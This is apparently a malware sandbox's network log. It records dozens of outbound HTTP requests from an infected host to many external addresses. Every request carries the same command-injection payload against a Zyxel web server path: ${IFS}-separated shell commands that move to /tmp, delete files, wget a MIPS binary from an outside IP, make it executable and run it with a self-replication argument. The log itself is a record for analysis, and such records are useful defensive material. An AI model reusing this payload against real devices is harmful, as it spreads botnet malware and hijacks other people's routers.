                                                        Jan 28, 2024 10:12:45.261701107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2451192.168.2.143780297.13.206.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261740923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2452192.168.2.145131239.199.160.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261776924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2453192.168.2.145731691.203.189.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261821032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2454192.168.2.145883693.93.194.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261869907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2455192.168.2.144816450.100.169.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261914968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2456192.168.2.143525286.82.56.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261940002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2457192.168.2.1434836135.167.255.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261998892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2458192.168.2.1459628183.149.185.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262042046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2459192.168.2.1437054151.111.77.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262089968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2460192.168.2.143905880.209.156.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262141943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2461192.168.2.1449980179.160.61.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262180090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2462192.168.2.1437624169.180.144.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262212038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2463192.168.2.143306096.250.137.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262310982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2464192.168.2.144566883.9.92.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262346983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2465192.168.2.1460240113.156.108.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262372971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2466192.168.2.143828493.60.0.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262406111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2467192.168.2.1460912212.93.54.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262444973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2468192.168.2.1459852145.152.141.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262489080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2469192.168.2.1442698168.212.19.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262538910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2470192.168.2.143360091.239.81.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262552023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2471192.168.2.144812240.132.18.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262589931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2472192.168.2.143609468.8.71.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262631893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2473192.168.2.1441522132.228.135.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262658119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2474192.168.2.1441834158.129.43.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262692928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2475192.168.2.1434494146.28.15.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262720108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2476192.168.2.1450952183.250.241.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262748003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2477192.168.2.143345440.52.118.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262784958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2478192.168.2.143389652.104.126.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262837887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2479192.168.2.144735234.181.218.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262873888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2480192.168.2.145758249.136.43.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262903929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2481192.168.2.1438512104.102.231.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262962103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2482192.168.2.1458668105.72.169.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.262989044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2483192.168.2.144080231.68.95.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263022900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2484192.168.2.145939894.77.83.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263082027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2485192.168.2.143546648.234.78.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263117075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2486192.168.2.143755425.61.80.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263161898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2487192.168.2.1453860187.3.217.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263191938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2488192.168.2.144378450.58.233.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263235092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2489192.168.2.1437880194.91.250.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263261080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2490192.168.2.145184271.192.222.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263293028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2491192.168.2.1435582145.154.139.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263339996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2492192.168.2.14424205.5.189.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263401031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2493192.168.2.1432836133.225.176.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263425112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2494192.168.2.1436638185.131.46.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263462067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2495192.168.2.1447370143.18.128.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263490915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2496192.168.2.143611617.49.126.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263531923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2497192.168.2.1448364136.91.191.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263564110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2498192.168.2.1458406150.83.128.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263613939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2499192.168.2.1442858119.174.193.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263658047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2500192.168.2.1443624100.218.107.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263683081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2501192.168.2.1459354100.24.250.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263725996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2502192.168.2.143649061.179.118.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263768911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2503192.168.2.1437750128.63.131.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263802052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2504192.168.2.1432832126.242.50.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263851881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2505192.168.2.145516437.208.157.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263886929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2506192.168.2.1459138211.141.145.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263914108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2507192.168.2.1449182222.50.152.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263972044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2508192.168.2.143725288.250.48.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.263999939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2509192.168.2.1444638188.84.5.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264030933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2510192.168.2.1441580126.183.156.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.264074087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2511192.168.2.143939480.57.79.229443
                                                        TimestampBytes transferredDirectionData
